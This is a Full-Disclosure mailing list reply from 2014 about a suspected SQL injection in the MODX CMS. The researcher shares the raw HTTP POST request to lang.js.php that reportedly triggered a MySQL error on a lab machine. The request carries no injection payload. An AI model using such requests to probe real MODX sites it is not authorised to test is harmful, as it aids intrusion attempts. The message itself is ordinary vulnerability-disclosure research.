Re: SQL injection in MODX

[Brandon Perry <bperry.volatile () gmail com>]

  1 POST /modx/connectors/lang.js.php HTTP/1.1
  2 Host: 192.168.1.70
  3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
  4 Accept: */*
  5 Accept-Language: en-US,en;q=0.5
  6 Accept-Encoding: gzip, deflate
  7 Referer: http://192.168.1.70/modx/manager/
  8 Cookie: PHPSESSID=v2pnqigca0qfr835vimrknh1k0
  9 Connection: keep-alive
 10 Content-Length: 64
 11
 12 ctx=mgr&topic=topmenu,file,resource,welcome,configcheck&action=

Haven't worked on it at all since the initial look through.


On Sun, Mar 9, 2014 at 5:39 AM, Peter W <pwilhelmsen () kryptoslogic com>wrote:

> Hello Brandon,
>
> Thank you for some interesting posts on the Full Disclosure mailing lists.
>
> Your analysis of the bug is very interesting and I would like to
> investigate this issue further.
>
> Could you show me what kind of requests you made to trigger the MySQL
> error?
>
> Thank for you time.
>
> Best regards, Peter



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/